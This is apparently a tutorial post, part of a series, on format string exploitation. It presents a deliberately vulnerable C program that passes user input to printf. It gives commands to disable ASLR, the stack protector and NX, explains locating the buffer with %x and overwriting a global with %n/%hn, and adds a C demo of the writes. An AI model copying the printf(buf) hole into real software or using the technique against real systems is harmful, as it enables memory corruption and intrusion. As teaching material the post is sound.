This time we will add some more fun to format string exploitation. Newcomers, please go through the earlier posts, part1 and part2, for a better understanding of the basics of format string exploitation.
Task :
Set the value of target to 0xbeefbeef
Program :
// to be compiled as `gcc -o 3 3.c -m32`
#include <stdio.h>
#include <string.h>

int target = 0;   // global: lives at a fixed address in .data once ASLR is off

int main(int argc, char **argv)
{
    char buf[100];
    strncpy(buf, argv[1], 100);   // crashes without an argument; no NUL terminator if argv[1] is 100+ bytes
    printf(buf);                  // user input used as the format string: the bug we exploit
    if ( target == 0xbeefbeef )
        printf("Pat yourself on the back for me, wont you?\n");
    else
        printf("\nYikes, the value of target=%08x\n", target);
    return 0;
}
Disabling the protections against buffer overflow and format string exploitation:
Disabling address randomization (needs root; the setting does not survive a reboot):
#sysctl -w kernel.randomize_va_space=0
Disabling the stack protector:
# gcc -fno-stack-protector -o example example.c
Disabling NX protection (executable stack):
# gcc -z execstack -fno-stack-protector -o example example.c
For this exercise compile 3.c with the -m32 flag from the comment above as well. Strictly speaking only the ASLR setting matters here: 'target' is a global in .data, so neither the stack protector nor NX stands in the way of a %n write, but the post disables them anyway to keep the setup simple. One more thing to watch for: Ubuntu's gcc turns on _FORTIFY_SOURCE when optimizing (-O1 or higher), which makes printf abort on a %n in a writable format string; compiling without optimization, as above, avoids that.
To reach the success message we have to change the content of the global variable 'target'. The program never assigns to it, so the comparison is always false unless we write to it ourselves.
Our task is therefore to find the address of 'target' and overwrite its content with 0xbeefbeef.
The format string vulnerability in printf(buf) lets us read memory: every %x in our input makes printf pop another word from the stack and print it.
We start the input with some marker characters (AAAA here) followed by a run of %x and look at the output for 41414141, the hex of AAAA. Its position tells us how many %x it takes before printf reads the start of our own buffer as an "argument". Whatever we place at the start of the buffer is then taken as a pointer by a %n at that position, so we now control an address that printf will write to.
Using gdb we find the address of 'target' and put it, in little-endian byte order, in AAAA's position. A %n directive stores the number of characters printed so far into the address it reads, so by padding the output with a width specifier we make that count 48879 (0xbeef), and the content at this address becomes 0x0000beef. We need to overwrite the adjacent address too, since we need beefbeef: the address plus 2 (0x804a026) goes right after the first copy, and a second %n writes the same count there, which sets the upper two bytes of 'target' to 0xbeef. Note that %n is a 4-byte write, so this also zeroes the two bytes just past 'target'; %hn would write only two bytes.
address of target : 0x804a024
I am writing 48864 instead of 48879. Why? This is left for the reader to find out.
(hint : I have already written some characters, so the count of those characters should be subtracted. Understand properly what printf is actually doing.)
output :
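The following program is an added example and not the exploit string from the original post. It reproduces the two writes described above (0xbeef at 'target', 0xbeef at 'target'+2) by passing the pointers to vsnprintf explicitly instead of smuggling them in through the stack, so the count arithmetic can be checked without gdb. It subtracts only the 8 address bytes that sit in front of the padding; the post's own subtraction is left to the reader. The struct layout, the 'run_payload' helper and the little-endian x86 assumption (4-byte int, 2-byte short) are mine, not the post's.

```c
/*
 * Added example: the %n and %hn writes that assemble 0xbeefbeef.
 * Not the original post's payload; pointers are passed explicitly.
 * Assumes little-endian x86 with 4-byte int and 2-byte short.
 */
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical layout for the demo: 'target' followed immediately by another
 * word, so a 4-byte write at target+2 visibly spills into the neighbour. */
struct victim {
    uint32_t target;
    uint32_t neighbour;
};

/* Runs a format string through vsnprintf into a scratch buffer large enough
 * that nothing is truncated, and returns the character count printf saw. */
static int run_payload(const char *fmt, ...)
{
    size_t cap = 1u << 17;            /* > 0xbeef, so the %n counts are exact */
    char *scratch = malloc(cap);
    if (scratch == NULL)
        return -1;
    va_list ap;
    va_start(ap, fmt);
    int count = vsnprintf(scratch, cap, fmt, ap);
    va_end(ap);
    free(scratch);
    return count;
}

/* The post's approach with %n. A real payload starts with the two 4-byte
 * addresses 0x804a024 and 0x804a026 (8 characters that printf counts before
 * any padding; here they are only counted, not dereferenced), then a width
 * directive that brings the running count to 0xbeef, then two %n.
 * Consecutive %n directives store the same count, so both words get
 * 0x0000beef: target becomes 0xbeefbeef, but the 4-byte write at target+2
 * also zeroes the low two bytes of the neighbour. */
static uint32_t write_with_n(struct victim *v)
{
    v->target = 0;
    v->neighbour = 0x41414141;
    int width = 0xbeef - 8;           /* subtract the 8 address bytes already printed */
    run_payload("\x24\xa0\x04\x08\x26\xa0\x04\x08%*x%n%n",
                width, 0,
                (int *)&v->target,
                (int *)((char *)&v->target + 2));
    return v->target;
}

/* Same write with %hn: each directive stores only the low 16 bits of the
 * count, so target+2 receives exactly 0xbeef and the neighbour is untouched. */
static uint32_t write_with_hn(struct victim *v)
{
    v->target = 0;
    v->neighbour = 0x41414141;
    int width = 0xbeef - 8;
    run_payload("\x24\xa0\x04\x08\x26\xa0\x04\x08%*x%hn%hn",
                width, 0,
                (short *)&v->target,
                (short *)((char *)&v->target + 2));
    return v->target;
}

int main(void)
{
    struct victim v;
    uint32_t t = write_with_n(&v);
    printf("%%n  : target=%08x neighbour=%08x\n", (unsigned)t, (unsigned)v.neighbour);
    t = write_with_hn(&v);
    printf("%%hn : target=%08x neighbour=%08x\n", (unsigned)t, (unsigned)v.neighbour);
    return 0;
}
```

In the real exploit the two pointers come from the buffer itself, which is why the %x-counting step above matters: the number of %x before the %n pair must land printf's argument pointer exactly on the first address. The %hn variant is the one to prefer when the bytes after the target are anything you care about.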